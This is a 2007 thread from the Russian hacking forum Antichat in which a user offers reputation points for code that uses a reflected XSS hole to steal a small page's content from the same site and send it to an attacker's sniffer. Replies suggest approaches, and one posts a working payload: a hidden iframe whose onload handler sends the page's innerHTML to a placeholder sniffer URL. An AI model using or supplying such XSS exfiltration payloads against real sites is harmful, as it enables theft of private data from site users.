Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
(+50) Вопрос по Javascript |
19.05.2007, 16:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
(+50) Вопрос по Javascript
Gh0s7 попропрорпросил запостить 
Собственно сабж. Есть вопрос по жс.
<Gh0s7> Ситуация такая:
<Gh0s7> Есть саент, на нем пассив гет хсс, длина неорграничена.
<Gh0s7> На том же саенте есть мааленькая страничка. Она очень маленькая, в одну строку, примерно 12-16 символов, полностью без хтмл.
<Gh0s7> Нужно через имеющуюся хсс слить эту страницу куда-нибудь, например на сниффер.
<Gh0s7> На сколько я знаю, это реально.
<Gh0s7> Тем, кто даст код +50 в репу (после того, как вернусь из отпуска, в понедельник)
__________________
ПИУ-ПИУ...
|
|
|
19.05.2007, 16:40
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362
Репутация:
175
|
|
через xss получить контент страницы? 0_о страница закрытая что ли? Типа для мемберов?
Думаю через XMLHttpRequest как-нить поколодовать можно. Отправить запрос на страницу, получить контент в качестве ответа, передать контент снифферу. Хотя хз.
Вариант 2:
Вставляем в уязвимую страницу фрейм с таргетом на закрытую страницу, и JS код который тырит контент фрейма (помоему innerHTML может из фрейма контент забрать?). ну и далее этот контент отправляем на снифак.
ЗЫ просто мысли в слух - надеюсь никто не против.
Последний раз редактировалось Abra; 19.05.2007 в 16:47..
|
|
|
|
19.05.2007, 17:05
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Код:
<script src=""></script>
мб так? имхо минимальный размер)
__________________
|
|
|
|
19.05.2007, 17:25
|
|
Banned
Регистрация: 06.05.2007
Сообщений: 87
Провел на форуме:
1420517
Репутация:
230
|
|
+toxa+=)
опередил
|
|
|
|
19.05.2007, 17:32
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
|
|
|
|
19.05.2007, 18:07
|
|
Banned
Регистрация: 06.05.2007
Сообщений: 87
Провел на форуме:
1420517
Репутация:
230
|
|
в случае фрейма должны быть одинаковые домены(тут тоже есть тонкость) фрейма и закрытой страницы
или нужно писать <frame src='javascript:......'> (не уверен что прокатит)
********
если я правильно понял про что вы ,
если нет-извините=)
|
|
|
|
19.05.2007, 18:50
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
Код HTML:
<iframe id="i1" name="i1" style="display:none" src="http://that/we/wish/to.steal" onload="i1.onload='';i1.contentDocument.location='http://our/sniffer.script?data='+escape(i1.contentDocument.getElementsByTagName('html')[0].innerHTML)"></iframe>
Это будет работать, естественно, если не противоречит безопасности JavaScript, т.е. страница с xss и похищяемая должны иметь одинаковые протокол и домен. |
|
|
|
19.05.2007, 18:54
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
GreenBear, все таки
Сообщение от Gh0s7
На том же саенте есть мааленькая страничка.
или
Сообщение от GreenBear
код страницы, где ксс
? |
|
|
|
19.05.2007, 19:04
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Сообщение от V1k
GreenBear, все таки
или
?
<Gh0s7> 'Не код страницы где хсс, а код той небольшой страницы, где 14-16 символов'
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
19.05.2007, 19:21
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
омг, ты в курсе что событие onload в iframe происходит после того, как полностью загрузилась страница, указанная в его src?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
